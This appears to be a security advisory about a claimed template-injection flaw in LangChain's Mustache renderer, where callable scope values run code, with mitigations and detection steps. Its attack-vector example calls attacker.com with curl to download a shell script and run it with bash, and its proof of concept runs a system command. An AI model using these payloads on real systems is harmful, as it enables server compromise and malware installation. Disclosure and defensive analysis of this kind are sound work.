Template Injection in LangChain Mustache Callable Scopes Leading to Remote Code Execution
Date: September 1, 2025 · Author: Karma-X Research Team
Severity: Medium to High Status: Unpatched · Active Exploitation: Unknown
Reference: LangChain Repository · Langflow Botnet Exploitation · Report to Huntr.com
Executive Summary
A template injection vulnerability has been discovered in LangChain's Mustache template processing engine that allows remote code execution through user-controlled callable scopes. This vulnerability affects all current versions of langchain-core
(including version 0.3.75) and poses severe risks to the entire AI/ML ecosystem due to LangChain's widespread adoption.
The vulnerability is already being actively exploited in production systems, most notably in the Langflow platform where attackers have deployed the Flodrix botnet, resulting in the compromise of thousands of servers worldwide. CISA has added related vulnerabilities to their Known Exploited Vulnerabilities catalog, highlighting the critical nature of this threat.
Organizations using LangChain-based applications, particularly those allowing user-generated templates or prompts, face immediate risk of complete server compromise, data theft, and recruitment into botnet networks.
Technical Details
Vulnerability Location
The vulnerability exists in LangChain's Mustache template implementation at:
libs/core/langchain_core/utils/mustache.py:535-583
GitHub Permalink: View vulnerable code
Root Cause
The Mustache template renderer processes callable objects as scope values without proper validation. When a template contains a callable scope, the system executes it directly:
if callable(scope):
# VULNERABLE: Executes user-controlled callable without validation
rend = scope(text, lambda template, data=None: render(...))
output += rend
Attack Vector
An attacker can exploit this by providing malicious callable functions as template scope values:
# Malicious payload example
def malicious_scope(text, render_func):
import subprocess
# Download and execute malware (Flodrix botnet pattern)
subprocess.run(['curl', 'http://attacker.com/flodrix.sh', '-o', '/tmp/malware.sh'])
subprocess.run(['bash', '/tmp/malware.sh'])
return "Template processed successfully"
# Template data controlled by attacker
template_data = {"malicious_key": malicious_scope}
render_mustache(template, template_data) # RCE occurs here
Active Exploitation Campaign
Langflow Flodrix Botnet
This vulnerability class is currently being exploited by the Flodrix botnet campaign targeting Langflow installations:
- CVE-2025-3248: CVSS 9.8 - Remote code execution in Langflow
- Attack Method: Malicious POST requests to
/api/v1/validate/code
- Payload: Python code that downloads and installs botnet malware
- Impact: Thousands of compromised servers worldwide
- CISA Status: Added to Known Exploited Vulnerabilities catalog
Attack Timeline
- Early 2025: Flodrix botnet begins targeting vulnerable Langflow servers
- May 2025: CISA adds CVE-2025-3248 to KEV list due to active exploitation
- June 2025: Security researchers document widespread botnet deployment
- Present: Ongoing exploitation with automated scanning for vulnerable targets
Vulnerable Platforms & Services
Multiple platforms built on LangChain are susceptible to this vulnerability:
Platform | Risk Level | Status |
---|---|---|
Langflow | Medium to High | No known fix |
Flowise | High | Multiple CVEs - Update to v2.1.1+ |
ChatBotBuilder.ai | High | Custom prompts feature at risk |
FastBots.ai | High | User-defined bot prompts |
LangChain Hub | Medium | Community template sharing |
Enterprise AI Tools | Medium | Internal template customization |
Proof of Concept
WARNING: The following proof of concept is for educational purposes only. Do not execute this code in production environments.
from langchain_core.utils.mustache import render
# Malicious callable that executes system commands
def execute_payload(text, render_func):
import subprocess
result = subprocess.run(['whoami'], capture_output=True, text=True)
print(f"Command executed as: {result.stdout}")
return "Template processed successfully"
# Template with placeholder
template = "Processing: {{malicious_scope}}"
# Attacker-controlled data
malicious_data = {
"malicious_scope": execute_payload
}
# Vulnerability triggered during rendering
output = render(template, malicious_data)
# Result: Command execution as current user
Impact Assessment
Confidentiality Impact: HIGH
- Complete access to server filesystem and environment variables
- Database credentials and API keys exposure
- Customer data and intellectual property theft
Integrity Impact: HIGH
- Arbitrary file modification and system configuration changes
- Malware installation and persistence mechanisms
- Application logic tampering and backdoor installation
Availability Impact: HIGH
- Service disruption through resource consumption
- Denial of service attacks and system crashes
- Botnet recruitment for DDoS activities
Business Impact
This vulnerability threatens the entire AI/ML supply chain, as hundreds of downstream applications inherit this security flaw. Organizations face risks ranging from data theft and intellectual property loss to regulatory compliance violations and reputational damage. The network-accessible nature of most vulnerable deployments makes this particularly dangerous for multi-tenant SaaS platforms.
Immediate Mitigation Strategies
For Organizations Using LangChain
- Audit Template Usage: Identify all code using Mustache templates with user-controlled data
- Input Validation: Block callable objects in template data
- Network Segmentation: Isolate AI/ML services from critical infrastructure
- Monitor for Exploitation: Watch for suspicious network traffic and unauthorized code execution
Code-Level Mitigations
# Secure wrapper for template rendering
def safe_render(template, data):
# Reject callable objects in template data
for key, value in data.items():
if callable(value):
raise SecurityError(f"Callable objects not allowed: {key}")
return render(template, data)
# Runtime detection wrapper
import functools
def secure_render_wrapper(original_render):
@functools.wraps(original_render)
def wrapper(template, data):
if any(callable(v) for v in data.values()):
logger.warning("SECURITY: Callable detected in template data")
raise SecurityError("Callable objects not permitted")
return original_render(template, data)
return wrapper
Platform-Specific Updates
- Langflow: Update to version 1.3.0 or later immediately
- Flowise: Update to version 2.1.1 or higher
- n8n: Update to version 0.216.2 or later
- Custom Applications: Implement input validation for all template data
Detection Methods
Static Code Analysis
# Search for vulnerable patterns in your codebase
grep -r "callable.*scope" --include="*.py" .
grep -r "langchain.*mustache" --include="*.py" .
grep -r "render.*template" --include="*.py" .
grep -r "from langchain_core.utils.mustache import" --include="*.py" .
Network Monitoring
- Monitor for unusual outbound connections from AI/ML services
- Watch for downloads of shell scripts or executables
- Alert on cryptocurrency miner processes
- Detect botnet command and control communication
Indicators of Compromise
- Unexpected CPU usage from Python processes
- Outbound network connections to suspicious domains
- New files in
/tmp/
or system directories - Processes named similar to system utilities but running from unusual locations
Industry Response & Timeline
Date | Event | Status |
---|---|---|
Early 2025 | Flodrix botnet begins exploiting Langflow | Active exploitation |
May 2025 | CISA adds CVE-2025-3248 to KEV list | Official recognition |
September 2025 | Core LangChain vulnerability discovered | Unpatched |
TBD | LangChain security patch release | Awaiting fix |
Recommendations for the AI/ML Community
For Developers
- Implement secure coding practices for template processing
- Never trust user-provided callable functions
- Use sandboxed execution environments for dynamic code
- Adopt a "defense in depth" approach to AI/ML security
For Platform Providers
- Implement automated security scanning for template injection vulnerabilities
- Provide clear documentation on secure template usage
- Establish responsible disclosure processes
- Consider bug bounty programs for AI/ML security research
For Organizations
- Conduct security audits of all AI/ML applications
- Implement network segmentation for AI services
- Establish incident response procedures for AI security events
- Monitor threat intelligence for AI/ML specific vulnerabilities
Looking Forward: Securing the AI Supply Chain
This vulnerability highlights the critical importance of security in the rapidly evolving AI/ML ecosystem. As AI technologies become increasingly integrated into business-critical applications, the attack surface expands significantly. The LangChain vulnerability demonstrates how a single flaw in a foundational library can cascade across hundreds of dependent applications and platforms.
The AI community must prioritize security research, implement robust testing frameworks, and establish industry-wide security standards. Organizations building on AI/ML frameworks need comprehensive security strategies that address both traditional cybersecurity concerns and AI-specific threats.
Technical References
- CWE-1336: Improper Neutralization of Special Elements in Template Engines
- CWE-94: Improper Control of Generation of Code ('Code Injection')
- OWASP Top 10: A03:2021 - Injection
- CVE-2025-3248: Langflow RCE vulnerability (CVSS 9.8)
- GitHub Repository: langchain-ai/langchain
- Vulnerability Location:
libs/core/langchain_core/utils/mustache.py:535-583
Disclosure Timeline
- September 1, 2025: Vulnerability discovered during comprehensive security audit
- September 1, 2025: Report submitted to Huntr.com for responsible disclosure
- September 1, 2025: Public disclosure due to active exploitation in wild
- TBD: Awaiting LangChain team response and patch development